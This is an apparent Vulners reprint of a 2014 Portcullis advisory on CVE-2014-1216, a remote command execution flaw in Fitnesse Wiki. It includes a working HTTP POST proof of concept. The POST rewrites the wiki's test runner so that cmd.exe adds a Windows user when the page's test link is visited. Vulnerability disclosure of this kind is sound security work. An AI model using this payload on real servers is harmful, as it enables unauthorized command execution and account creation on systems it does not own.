Lucene search
K

Fitnesse Wiki 20131110 Remote Command Execution

🗓️ 02 Mar 2014 00:00:00Reported by Jerzy KramarzType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 55 Views

Remote Command Execution in Fitnesse Wiki v20131110 and earlie

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Fitnesse Wiki 20131110 Remote Command Execution
2 Mar 201400:00
zdt
0day.today
Fitnesse Wiki Remote Command Execution Vulnerability
29 Mar 201400:00
zdt
Circl
CVE-2014-1216
28 Mar 201400:00
circl
CVE
CVE-2014-1216
21 Apr 201414:00
cve
Cvelist
CVE-2014-1216
21 Apr 201414:00
cvelist
Exploit DB
Fitnesse Wiki - Remote Command Execution (Metasploit)
28 Mar 201400:00
exploitdb
EUVD
EUVD-2022-4606
3 Oct 202520:07
euvd
exploitpack
Fitnesse Wiki - Remote Command Execution (Metasploit)
28 Mar 201400:00
exploitpack
Github Security Blog
Improper Neutralization of Special Elements used in a Command in FitNesse Wiki
17 May 202204:46
github
NVD
CVE-2014-1216
22 Apr 201413:06
nvd
Rows per page
`Vulnerability title: Remote Command Execution in Fitnesse Wiki  
CVE: CVE-2014-1216  
Vendor: Fitnesse  
Product: Wiki  
Affected version: v20131110 and earlier  
Fixed version: N/A  
Reported by: Jerzy Kramarz  
  
Details:  
  
The Fitnesse wiki does not validate the syntax of edited pages to  
validate whether the pages are introducing any extra parameters that  
could be executed in the context of the application. This vulnerability  
could be exploited by remote attackers to introduce external commands  
into the workflow of the application that would execute them.  
  
Exploit  
  
After creating a new page in the wiki (or editing already existing page) sending a request similar to below would trigger the vulnerability:  
  
POST /<any page> HTTP/1.1  
Host: <host>:<port>  
Proxy-Connection: keep-alive  
Content-Length: 374  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Origin: http://<host>:<port>  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36  
Content-Type: application/x-www-form-urlencoded  
DNT: 1  
Referer: http://<host>:<port>/<page>?edit  
Accept-Encoding: gzip,deflate,sdch  
Accept-Language: en-US,en;q=0.8  
Cookie: textwrapon=false; wysiwyg=textarea  
  
editTime=1384209902568&ticketId=-7153973663219190464&responder=saveData&helpText=&suites=&__EDITOR__1=textarea&pageContent=%21define+COMMAND_PATTERN+%7B%25m+%7C%7C+%7D%0D%0A%21define+TEST_RUNNER+%7Bcmd.exe+%2Fc+%22net+user+XXXXXXXX+XXXXXXXX+%2Fadd%22%7D%0D%0A%21path+dotnet4%5Cdbfit.dll%0D%0A%21path+dotnet4%5Cdbfit.sqlserver.dll%0D%0A%21path+dotnet2%5C*.dll&save=Save  
  
After editing the page with content specified above, the vulnerability could be triggered by visiting ‘http://<host>:<port>/<created/edited page name>?test’  
  
  
  
  
Further details at:  
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1216/  
  
  
Copyright:  
Copyright (c) Portcullis Computer Security Limited 2014, All rights  
reserved worldwide. Permission is hereby granted for the electronic  
redistribution of this information. It is not to be edited or altered in  
any way without the express written consent of Portcullis Computer  
Security Limited.  
  
Disclaimer:  
The information herein contained may change without notice. Use of this  
information constitutes acceptance for use in an AS IS condition. There  
are NO warranties, implied or otherwise, with regard to this information  
or its use. Any use of this information is at the user's risk. In no  
event shall the author/distributor (Portcullis Computer Security  
Limited) be held liable for any damages whatsoever arising out of or in  
connection with the use or spread of this information.  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Mar 2014 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.03923
55